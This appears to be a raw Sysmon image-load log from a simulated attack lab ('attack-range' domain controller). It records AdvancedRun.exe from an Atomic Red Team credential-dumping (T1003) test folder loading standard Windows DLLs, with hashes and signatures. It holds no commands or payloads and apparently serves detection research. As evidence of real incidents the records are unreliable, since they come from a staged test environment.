CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951926Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951925Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951923Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951921Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951920Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951918Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951917Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951916Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951915Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951914Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951913Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951911Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951907Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951902Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.276{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003951892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.261{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 